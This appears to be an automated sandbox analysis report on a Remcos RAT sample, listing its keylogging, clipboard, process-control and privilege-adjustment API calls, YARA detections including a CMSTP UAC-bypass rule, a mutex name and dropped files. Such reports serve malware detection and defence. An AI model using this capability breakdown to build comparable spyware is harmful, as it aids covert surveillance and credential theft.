Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function 0_2_0040A2F3: SetWindowsHookExA 0000000D (WH_KEYBOARD_LL), 0040A2DF, 00000000
Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe
Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function 0_2_0040B749: OpenClipboard, GetClipboardData, CloseClipboard
Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function 0_2_004168FC: OpenClipboard, EmptyClipboard, GlobalAlloc, GlobalLock, GlobalUnlock, SetClipboardData, CloseClipboard, OpenClipboard, GetClipboardData, GlobalLock, GlobalUnlock, CloseClipboard
Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function 0_2_0040A41B: GetForegroundWindow, GetWindowThreadProcessId, GetKeyboardLayout, GetKeyState, GetKeyboardState, ToUnicodeEx, ToUnicodeEx, ToUnicodeEx, ToUnicodeEx
Source: Yara match | File source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, type: SAMPLE
Source: Yara match | File source: 0.2.17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.2175133172.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe PID: 1516, type: MEMORYSTR

E-Banking Fraud

Source: Yara match | File source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, type: SAMPLE
Source: Yara match | File source: 0.2.17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.4629979476.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.4630392620.000000000222F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.2175133172.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.4629979476.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe PID: 1516, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function 0_2_0041CA73: SystemParametersInfoW

System Summary

Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, type: SAMPLE | Matched rule: Windows_Trojan_Remcos_b296e965 | Author: unknown
Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, type: SAMPLE | Matched rule: REMCOS_RAT_variants | Author: unknown
Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, type: SAMPLE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | Author: ditekSHen
Source: 0.2.17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 | Author: unknown
Source: 0.2.17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants | Author: unknown
Source: 0.2.17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | Author: ditekSHen
Source: 0.0.17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 | Author: unknown
Source: 0.0.17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants | Author: unknown
Source: 0.0.17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | Author: ditekSHen
Source: 00000000.00000000.2175133172.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 | Author: unknown
Source: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 | Author: unknown
Source: Process Memory Space: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe PID: 1516, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 | Author: unknown
Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function 0_2_0041330D: OpenProcess, NtQueryInformationProcess, GetCurrentProcess, DuplicateHandle, GetFinalPathNameByHandleW, CloseHandle, CreateFileMappingW, MapViewOfFile, GetFileSize, UnmapViewOfFile, CloseHandle, CloseHandle, CloseHandle
Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function 0_2_0041BBC6: OpenProcess, NtResumeProcess, CloseHandle
Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function 0_2_0041BB9A: OpenProcess, NtSuspendProcess, CloseHandle
Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function 0_2_004167EF: ExitWindowsEx, LoadLibraryA, GetProcAddress
Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function 0_2_0043706A
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_004140050_2_00414005
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_0043E11C0_2_0043E11C
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_004541D90_2_004541D9
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_004381E80_2_004381E8
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_0041F18B0_2_0041F18B
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_004462700_2_00446270
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_0043E34B0_2_0043E34B
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_004533AB0_2_004533AB
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_0042742E0_2_0042742E
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_004375660_2_00437566
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_0043E5A80_2_0043E5A8
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_004387F00_2_004387F0
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_0043797E0_2_0043797E
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_004339D70_2_004339D7
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_0044DA490_2_0044DA49
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_00427AD70_2_00427AD7
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_0041DBF30_2_0041DBF3
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_00427C400_2_00427C40
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_00437DB30_2_00437DB3
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_00435EEB0_2_00435EEB
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_0043DEED0_2_0043DEED
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_00426E9F0_2_00426E9F
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: String function: 00402093 appears 50 times
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: String function: 00401E65 appears 35 times
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: String function: 00434E70 appears 54 times
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: String function: 00434801 appears 42 times
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, type: SAMPLEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, type: SAMPLEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                          Source: 0.2.17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: 0.2.17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                          Source: 0.2.17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                          Source: 0.0.17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: 0.0.17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                          Source: 0.0.17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                          Source: 00000000.00000000.2175133172.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: Process Memory Space: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe PID: 1516, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@1/2@2/2
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,0_2_0041798D
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,0_2_0040F4AF
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_0041B539 FindResourceA,LoadResource,LockResource,SizeofResource,0_2_0041B539
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,0_2_0041AADB
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\json[1].jsonJump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeMutant created: \Sessions\1\BaseNamedObjects\hhh-AQVE0Z
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: PG0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: PG0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: Software\0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: hhh-AQVE0Z0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: Exe0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: Exe0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: hhh-AQVE0Z0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: ,aF0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: Inj0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: Inj0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: PG0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: PG0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: PG0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: 8)[0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: 8)[0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: 8)[0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: 0C[0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: 8)[0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: exepath0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: PG0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: ,aF0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: 0C[0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: exepath0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: 8)[0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: PG0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: licence0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: PG0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: PG0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: PG0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: PG0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: PG0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: PG0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: dMG0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: PG0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: PG0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: PSG0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: Administrator0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: User0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: del0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: del0_2_0040EA00
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCommand line argument: del0_2_0040EA00
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
